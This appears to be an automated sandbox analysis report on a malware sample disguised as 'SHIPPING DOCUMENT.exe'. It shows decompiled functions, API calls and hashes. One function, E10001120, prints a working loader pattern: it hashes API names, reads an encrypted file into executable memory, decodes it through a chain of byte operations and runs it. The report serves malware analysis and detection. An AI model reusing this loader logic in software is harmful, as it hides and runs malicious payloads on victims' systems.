                                            0x004070c8
                                            0x004070c8
                                            0x004070e3
                                            0x004070ea
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x004070ec
                                            0x00000000
                                            0x00406d88
                                            0x00406d8b
                                            0x00406dc1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef1
                                            0x00406ef4
                                            0x00406ef4
                                            0x00406ef7
                                            0x00406ef9
                                            0x00407183
                                            0x00000000
                                            0x00407183
                                            0x00406eff
                                            0x00406f02
                                            0x00000000
                                            0x00000000
                                            0x00406f08
                                            0x00406f0c
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f0f
                                            0x00000000
                                            0x00406f0f
                                            0x00406d8d
                                            0x00406d8f
                                            0x00406d91
                                            0x00406d93
                                            0x00406d96
                                            0x00406d97
                                            0x00406d99
                                            0x00406d9b
                                            0x00406d9e
                                            0x00406da1
                                            0x00406db7
                                            0x00406dbc
                                            0x00406df4
                                            0x00406df4
                                            0x00406df8
                                            0x00406e24
                                            0x00406e26
                                            0x00406e2d
                                            0x00406e30
                                            0x00406e33
                                            0x00406e33
                                            0x00406e38
                                            0x00406e38
                                            0x00406e3a
                                            0x00406e3d
                                            0x00406e44
                                            0x00406e47
                                            0x00406e74
                                            0x00406e74
                                            0x00406e77
                                            0x00406e7a
                                            0x00406eee
                                            0x00406eee
                                            0x00406eee
                                            0x00000000
                                            0x00406eee
                                            0x00406e7c
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8b
                                            0x00406e8e
                                            0x00406e91
                                            0x00406e94
                                            0x00406e97
                                            0x00406e9a
                                            0x00406e9d
                                            0x00406eb6
                                            0x00406eb8
                                            0x00406ebb
                                            0x00406ebc
                                            0x00406ebf
                                            0x00406ec1
                                            0x00406ec4
                                            0x00406ec6
                                            0x00406ec8
                                            0x00406ecb
                                            0x00406ecd
                                            0x00406ed0
                                            0x00406ed4
                                            0x00406ed6
                                            0x00406ed6
                                            0x00406ed7
                                            0x00406eda
                                            0x00406edd
                                            0x00406e9f
                                            0x00406e9f
                                            0x00406ea7
                                            0x00406eac
                                            0x00406eae
                                            0x00406eb1
                                            0x00406eb1
                                            0x00406ee0
                                            0x00406ee7
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00406e71
                                            0x00000000
                                            0x00406ee9
                                            0x00000000
                                            0x00406ee9
                                            0x00406ee7
                                            0x00406dfa
                                            0x00406dfd
                                            0x00406dff
                                            0x00406e02
                                            0x00406e05
                                            0x00406e08
                                            0x00406e0a
                                            0x00406e0d
                                            0x00406e10
                                            0x00406e10
                                            0x00406e13
                                            0x00406e13
                                            0x00406e16
                                            0x00406e1d
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00406df1
                                            0x00000000
                                            0x00406e1f
                                            0x00000000
                                            0x00406e1f
                                            0x00406e1d
                                            0x00406da3
                                            0x00406da6
                                            0x00406da8
                                            0x00406dab
                                            0x00000000
                                            0x00000000
                                            0x00406b0a
                                            0x00406b0a
                                            0x00406b0e
                                            0x00407153
                                            0x00000000
                                            0x00407153
                                            0x00406b14
                                            0x00406b17
                                            0x00406b1a
                                            0x00406b1d
                                            0x00406b20
                                            0x00406b23
                                            0x00406b26
                                            0x00406b28
                                            0x00406b2b
                                            0x00406b2e
                                            0x00406b31
                                            0x00406b33
                                            0x00406b33
                                            0x00406b33
                                            0x00000000
                                            0x00000000
                                            0x00406c95
                                            0x00406c95
                                            0x00406c99
                                            0x0040715f
                                            0x00000000
                                            0x0040715f
                                            0x00406c9f
                                            0x00406ca2
                                            0x00406ca5
                                            0x00406ca8
                                            0x00406caa
                                            0x00406caa
                                            0x00406caa
                                            0x00406cad
                                            0x00406cb0
                                            0x00406cb3
                                            0x00406cb6
                                            0x00406cb9
                                            0x00406cbc
                                            0x00406cbd
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cbf
                                            0x00406cc2
                                            0x00406cc5
                                            0x00406cc8
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406ccb
                                            0x00406cce
                                            0x00406cd0
                                            0x00406cd0
                                            0x00000000
                                            0x00000000
                                            0x00406f12
                                            0x00406f12
                                            0x00406f12
                                            0x00406f16
                                            0x00000000
                                            0x00000000
                                            0x00406f1c
                                            0x00406f1f
                                            0x00406f22
                                            0x00406f25
                                            0x00406f27
                                            0x00406f27
                                            0x00406f27
                                            0x00406f2a
                                            0x00406f2d
                                            0x00406f30
                                            0x00406f33
                                            0x00406f36
                                            0x00406f39
                                            0x00406f3a
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3c
                                            0x00406f3f
                                            0x00406f42
                                            0x00406f45
                                            0x00406f48
                                            0x00406f4b
                                            0x00406f4f
                                            0x00406f51
                                            0x00406f54
                                            0x00000000
                                            0x00406f56
                                            0x00406cd3
                                            0x00406cd3
                                            0x00000000
                                            0x00406cd3
                                            0x00406f54
                                            0x00407189
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x004071c0
                                            0x004071c0
                                            0x00000000
                                            0x004071c0
                                            0x0040700d
                                            0x00406f94
                                            0x00406f91

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                            • Instruction ID: 903876060ddd0b56a19be001448e640a61514b7b9d13fdc5f9f4a1faaeb2382a
                                            • Opcode Fuzzy Hash: e1b0e058f0407479a5b4db29d08bd0827f70999cda66fb763b614c0a8a1c0f1e
                                            • Instruction Fuzzy Hash: AA714431D04229CBDF28CF98C844BADBBB1FF44305F15806AD856BB281C778AA96DF45
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10001120, Relevance: 4.7, APIs: 3, Instructions: 164filememoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 62%
                                            			E10001120(void* __eflags) {
				signed int _v8;
				short _v528;
				signed int _v529;
				signed int _v536;
				intOrPtr _v540;
				void* _v544;
				long _v548;
				void* _v552;
				long _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				signed int _t170;

				_v8 =  *0x10003020 ^ _t170;
				_v536 = 0;
				_v556 = 0;
				_v540 = E10001000();
				_v568 = E10001070(_v540, 0x8a111d91);
				_v560 = E10001070(_v540, 0xcbec1a0);
				_v564 = E10001070(_v540, 0xa4f84a9a);
				_v572 = E10001070(_v540, 0x170c1ca1);
				_v580 = E10001070(_v540, 0x433a3842);
				_v576 = E10001070(_v540, 0xa5f15738);
				_v560(0x103,  &_v528);
				_v564( &_v528, 0x10003000);
				_v552 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0);
				_v548 = _v572(_v552, 0);
				_v544 = VirtualAlloc(0, _v548, 0x3000, 0x40);
				ReadFile(_v552, _v544, _v548,  &_v556, 0);
				_v536 = 0;
				while(_v536 < _v556) {
					_v529 =  *((intOrPtr*)(_v544 + _v536));
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - 0x91;
					_v529 =  ~(_v529 & 0x000000ff);
					_v529 = _v529 & 0x000000ff ^ _v536;
					_v529 =  ~(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - 0xe4;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - _v536;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) + _v536;
					_v529 = _v529 & 0x000000ff ^ 0x00000002;
					_v529 = (_v529 & 0x000000ff) - 0xef;
					_v529 = _v529 & 0x000000ff ^ 0x000000b8;
					_v529 = (_v529 & 0x000000ff) - 0x27;
					_v529 =  ~(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - 0x9d;
					_v529 =  !(_v529 & 0x000000ff);
					_v529 =  ~(_v529 & 0x000000ff);
					_v529 = (_v529 & 0x000000ff) - 0x9e;
					 *((char*)(_v544 + _v536)) = _v529;
					_v536 = _v536 + 1;
				}
				_v544();
				return E100014DD(_v8 ^ _t170);
			}



















                                            0x10001130
                                            0x10001133
                                            0x1000113d
                                            0x1000114c
                                            0x10001166
                                            0x10001180
                                            0x1000119a
                                            0x100011b4
                                            0x100011ce
                                            0x100011e8
                                            0x100011fa
                                            0x1000120c
                                            0x10001231
                                            0x10001246
                                            0x10001262
                                            0x10001286
                                            0x1000128c
                                            0x100012a7
                                            0x100012c7
                                            0x100012d6
                                            0x100012e9
                                            0x100012f8
                                            0x1000130b
                                            0x1000131a
                                            0x1000132c
                                            0x1000133b
                                            0x1000134e
                                            0x1000135d
                                            0x10001370
                                            0x10001380
                                            0x10001392
                                            0x100013a5
                                            0x100013b5
                                            0x100013c4
                                            0x100013d7
                                            0x100013e6
                                            0x100013f5
                                            0x10001408
                                            0x10001420
                                            0x100012a1
                                            0x100012a1
                                            0x10001427
                                            0x1000143a

                                            APIs
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000122B
                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 1000125C
                                            • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 10001286
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661934764.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.661929652.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661940270.0000000010002000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AllocCreateReadVirtual
                                            • String ID:
                                            • API String ID: 3585551309-0
                                            • Opcode ID: 90bfcedad817221b06425adc79be2b9976eb81a4517eff4173f29d220f8e86c0
                                            • Instruction ID: f7c4f3ce2330e6f1b5deaa9468ab83127e203b0a049b58929e2122a78ed932af
                                            • Opcode Fuzzy Hash: 90bfcedad817221b06425adc79be2b9976eb81a4517eff4173f29d220f8e86c0
                                            • Instruction Fuzzy Hash: EC811D74C4A2BC9ADB21CBA49C9C7ECBF709F26241F0481C9E59C66287C6345BC4CF61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040329A, Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E0040329A(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x41f8fc; // 0x3129d
				_t34 = _t32 -  *0x40b868 + _a4;
				 *0x424750 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E00403419( *0x41f90c);
				SetFilePointer( *0x40a01c,  *0x40b868, 0, 0); // executed
				 *0x41f908 = _t34;
				 *0x41f8f8 = 0;
				while(1) {
					_t10 =  *0x41f900; // 0x391e1
					_t31 = 0x4000;
					_t11 = _t10 -  *0x41f90c;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E00403403(0x4138f8, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x41f90c =  *0x41f90c + _t31;
					 *0x40b888 = 0x4138f8;
					 *0x40b88c = _t31;
					L6:
					L6:
					if( *0x424754 != 0 &&  *0x424800 == 0) {
						_t19 =  *0x41f908; // 0xd9f
						 *0x41f8f8 = _t19 -  *0x41f8fc - _a4 +  *0x40b868;
						E00402E52(0);
					}
					 *0x40b890 = 0x40b8f8;
					 *0x40b894 = 0x8000; // executed
					_t14 = E00406776(0x40b870); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40b890; // 0x40c697
					_t37 = _t36 - 0x40b8f8;
					if(_t37 == 0) {
						__eflags =  *0x40b88c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x41f8fc; // 0x3129d
						if(_t16 -  *0x40b868 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E68( *0x40a01c, 0x40b8f8, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b868 =  *0x40b868 + _t37;
					_t49 =  *0x40b88c; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                            0x0040329d
                                            0x004032aa
                                            0x004032bd
                                            0x004032c2
                                            0x004033f2
                                            0x004033f4
                                            0x00000000
                                            0x004033fa
                                            0x004032ce
                                            0x004032e1
                                            0x004032e7
                                            0x004032ed
                                            0x004032f8
                                            0x004032f8
                                            0x004032fd
                                            0x00403302
                                            0x0040330a
                                            0x0040330c
                                            0x0040330c
                                            0x00403315
                                            0x0040331c
                                            0x00000000
                                            0x00000000
                                            0x00403322
                                            0x00403328
                                            0x0040332e
                                            0x00000000
                                            0x00403334
                                            0x0040333a
                                            0x00403344
                                            0x0040335a
                                            0x0040335f
                                            0x00403364
                                            0x0040336a
                                            0x00403370
                                            0x0040337a
                                            0x00403381
                                            0x00000000
                                            0x00000000
                                            0x00403383
                                            0x00403389
                                            0x0040338b
                                            0x004033ae
                                            0x004033b4
                                            0x00000000
                                            0x00000000
                                            0x004033b6
                                            0x004033b8
                                            0x00000000
                                            0x00000000
                                            0x004033ba
                                            0x004033ba
                                            0x004033cd
                                            0x00000000
                                            0x00000000
                                            0x004033dc
                                            0x00000000
                                            0x004033dc
                                            0x00403395
                                            0x0040339c
                                            0x004033e9
                                            0x004033ef
                                            0x004033ef
                                            0x00000000
                                            0x004033ef
                                            0x0040339e
                                            0x004033a4
                                            0x004033aa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004033ed
                                            0x004033ed
                                            0x00000000
                                            0x004033ed
                                            0x00000000

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 004032AE
                                              • Part of subcall function 00403419: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427
                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004032E1
                                            • SetFilePointer.KERNELBASE(0003129D,00000000,00000000,004138F8,00004000,?,00000000,004031C4,00000004,00000000,00000000,?,?,0040313E,000000FF,00000000), ref: 004033DC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FilePointer$CountTick
                                            • String ID:
                                            • API String ID: 1092082344-0
                                            • Opcode ID: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                            • Instruction ID: 9f56c4e15643f9c800c1675ca7a95df02ba07fd451ae32c2dc2afdd0933238d4
                                            • Opcode Fuzzy Hash: 10914339fb078c172392a439e9ed0b3db4c7f76b37a754b5eca90989c3c04b63
                                            • Instruction Fuzzy Hash: E6317A72500216DFD710BF2AEE8496A3BACE740356324C13BE914B22F0CB3899469B9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403192, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E00403192(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4247b8;
					 *0x41f8fc = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040329A(4);
				if(_t22 >= 0) {
					_t24 = E00405E39( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x41f8fc =  *0x41f8fc + 4;
						_t36 = E0040329A(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x41f8fc =  *0x41f8fc + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E39( *0x40a01c, 0x4138f8, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E68(_a8, 0x4138f8, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x41f8fc =  *0x41f8fc + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                            0x00403196
                                            0x0040319f
                                            0x004031a8
                                            0x004031ac
                                            0x004031b7
                                            0x004031b7
                                            0x004031bf
                                            0x004031c6
                                            0x004031d8
                                            0x004031df
                                            0x00403284
                                            0x00403284
                                            0x00000000
                                            0x004031e5
                                            0x004031e8
                                            0x004031f4
                                            0x004031f8
                                            0x00403292
                                            0x00403292
                                            0x004031fe
                                            0x00403201
                                            0x00403260
                                            0x00403266
                                            0x00403268
                                            0x00403268
                                            0x0040327a
                                            0x00403282
                                            0x00403289
                                            0x0040328c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403203
                                            0x00403206
                                            0x00000000
                                            0x0040320c
                                            0x00403211
                                            0x00403218
                                            0x0040321b
                                            0x0040321d
                                            0x0040321d
                                            0x0040322a
                                            0x00403234
                                            0x00000000
                                            0x00000000
                                            0x0040323d
                                            0x00403244
                                            0x0040325c
                                            0x00403286
                                            0x00403286
                                            0x00403246
                                            0x00403246
                                            0x00403249
                                            0x0040324c
                                            0x00403252
                                            0x00403258
                                            0x00000000
                                            0x0040325a
                                            0x00000000
                                            0x0040325a
                                            0x00403258
                                            0x00000000
                                            0x00403244
                                            0x00000000
                                            0x00403211
                                            0x00403206
                                            0x00403201
                                            0x004031f8
                                            0x004031df
                                            0x00403294
                                            0x00403297

                                            APIs
                                            • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,0040313E,000000FF,00000000,00000000,0040A130,?), ref: 004031B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                            • Instruction ID: 417efc13fc3ab0d651ced5ea1d77d103914e3086752ee655c490bf772f36c9c7
                                            • Opcode Fuzzy Hash: 01e98dbf49a9efced9094fa2c3d361a4303186e46b1d46872f44f8f4f7fda8b1
                                            • Instruction Fuzzy Hash: 6A316D30100319FFDB109F96ED48A9A7FA8EB04359B20847FF914E6190D338DB519BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424790;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x423f2c =  *0x423f2c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x423f2c, 0x7530,  *0x423f14), 0);
					}
				}
				return 0;
			}










                                            0x0040138a
                                            0x004013fa
                                            0x0040139b
                                            0x004013a0
                                            0x00000000
                                            0x00000000
                                            0x004013a2
                                            0x004013a3
                                            0x004013ad
                                            0x00000000
                                            0x00401404
                                            0x004013b0
                                            0x004013b7
                                            0x004013bd
                                            0x004013be
                                            0x004013c0
                                            0x004013c2
                                            0x004013b9
                                            0x004013b9
                                            0x004013ba
                                            0x004013ba
                                            0x004013c9
                                            0x004013cb
                                            0x004013f4
                                            0x004013f4
                                            0x004013c9
                                            0x00000000

                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                            • Instruction ID: 619251f0f573ab9f47b456b69b18ba8f896b0ae65f75ba169e48b75275ff5987
                                            • Opcode Fuzzy Hash: bd8df2336641fef3ba5122bb8ee68c85eddc30aa2a367a6b625e197710042414
                                            • Instruction Fuzzy Hash: F301D131B242109BE7194B38AE04B2A36A8E754315F11813AF855F61F1DA78CC129B4C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406631, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00406631(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065C3(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                            0x00406639
                                            0x0040663c
                                            0x00406643
                                            0x0040664b
                                            0x00406657
                                            0x00000000
                                            0x0040665e
                                            0x0040664e
                                            0x00406655
                                            0x00000000
                                            0x00406666
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                              • Part of subcall function 004065C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                              • Part of subcall function 004065C3: wsprintfA.USER32 ref: 00406613
                                              • Part of subcall function 004065C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                            • Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
                                            • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                            • Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00405DC1(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                            0x00405dc5
                                            0x00405dd2
                                            0x00405de7
                                            0x00405ded

                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\SHIPPING DOCUMENT.exe,80000000,00000003), ref: 00405DC5
                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                            • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                            • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                            • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
